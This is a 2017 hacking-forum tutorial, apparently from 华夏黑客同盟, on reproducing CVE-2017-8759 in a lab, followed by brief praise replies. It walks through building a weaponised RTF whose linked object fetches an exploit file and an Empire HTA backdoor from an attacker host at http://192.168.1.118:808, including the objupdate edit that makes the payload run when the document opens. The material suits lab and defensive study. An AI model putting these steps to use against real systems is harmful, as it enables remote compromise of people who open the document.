联系我们联系我们
电子邮箱电子邮箱

【原创】最新CVE-2017-8759漏洞复现的两种姿势

[复制链接]
  • TA的每日心情

    2017-11-3 08:38
  • 签到天数: 129 天

    [LV.7]常住居民III

    一把附魔钻石剑 发表于 2017-9-14 12:17:02
    609 3
    大家好,我是你们的老朋友Alex。今天教大家复现漏洞CVE-2017-8759
    https://github.com/vysec/CVE-2017-8759
    该漏洞影响所有主流的.NETFramework版本
    Microsoft .NET Framework4.6.2
    Microsoft .NET Framework4.6.1
    Microsoft .NET Framework3.5.1
    Microsoft .NET Framework4.7
    Microsoft .NET Framework4.6
    Microsoft .NET Framework4.5.2
    Microsoft .NET Framework3.5
    Microsoft .NET Framework 2.0 SP2

    环境:
    Kali linux    IP   192.168.1.118
    Win8.1靶机 IP   192.168.1.19   OFFICE2013

    kali中使用Empire生成HTA后门
    image001.png
    修改exploit.txt文件
    image003.png
    开启apache或者使用python -m SimpleHTTPServer建立链接
    image005.png
    并且把HTA上传到同一路径下。

    然后使用word新建一个rtf,插入一个链接到文件的对象http://192.168.1.118:808/exploit.txt
    image007.png
    然后使用C32编辑blob.bin,修改位置如下
    image009.png
    右键拷贝HEX格式所有,使用编辑器打开rtf文件替换代码
    image011.png
    再将objautlink前插入objupdate
    image013.png
    保存修改后我们测试一下效果!
    image015.png
    (o)o☆[BINGO!]
    image017.png

    还有一种利用姿势就是使用宏来加载HTA文件,项目地址:
    ByeBye~


    评分

    参与人数 1威望 +10 金钱 +30 贡献 +5 收起 理由
    HoxTon、夔龍 + 10 + 30 + 5 很给力!

    查看全部评分

    回复

    使用道具 举报

    HoxTon、夔龍 发表于 2017-9-14 15:28:44
    牛逼克拉斯
    回复 支持 反对

    使用道具 举报

    jishuzhain 发表于 2017-9-15 09:32:10
    厉害了,昨天没看懂,今天懂了
    回复 支持 反对

    使用道具 举报

     楼主| 一把附魔钻石剑 发表于 2017-9-15 10:33:27
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    发表新帖

    小黑屋|手机版|Archiver|华盟论坛 ( 京ICP证070028号 )

    Powered by 华盟网 X 8.0  © 2001-2013 Comsenz Inc.  华夏黑客同盟